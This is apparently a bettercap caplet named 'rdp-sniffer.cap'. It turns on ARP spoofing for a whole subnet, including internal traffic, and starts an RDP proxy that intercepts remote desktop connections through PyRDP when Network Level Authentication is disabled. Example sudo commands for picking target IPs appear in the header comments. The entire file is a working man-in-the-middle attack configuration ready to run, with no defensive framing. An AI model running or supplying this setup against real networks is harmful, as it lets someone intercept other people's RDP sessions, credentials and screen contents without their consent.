# This module lets you arp spoof desired targets, and proxy their RDP connections if they have NLA disabled.
# If they don't, we forward their connection without spawning PyRDP
# 
# Targets the whole subnet by default. Can be configured in bettercap or in this file.
#   
# To change arp-spoofed targets :
#	sudo ./bettercap -caplet rdp-sniffer.cap -eval "set arp.spoof.targets 192.168.0.50, 192.168.0.51;"
#
# To change RDP proxy targets :
#	sudo ./bettercap -caplet rdp-sniffer.cap -eval "set rdp.proxy.targets 192.168.0.50;"
#
# To change both targets :
#	sudo ./bettercap -caplet rdp-sniffer.cap -eval "set arp.spoof.targets 192.168.0.50, 192.168.0.51; set rdp.proxy.targets 192.168.0.50;"

# Setup arp spoofing
# If true, local connections among computers of the network will be spoofed as well
# Otherwise only connections going to and coming from the external network.
set arp.spoof.internal true

# Setup targets
# Uncomment to specify targets
#set arp.spoof.targets 192.168.0.50, 192.168.0.51
#set rdp.proxy.targets 192.168.0.50

# Start everything
arp.spoof on
rdp.proxy on

# Silence net.recon to avoid useless spam
events.ignore endpoint

# Start fresh
events.clear
clear
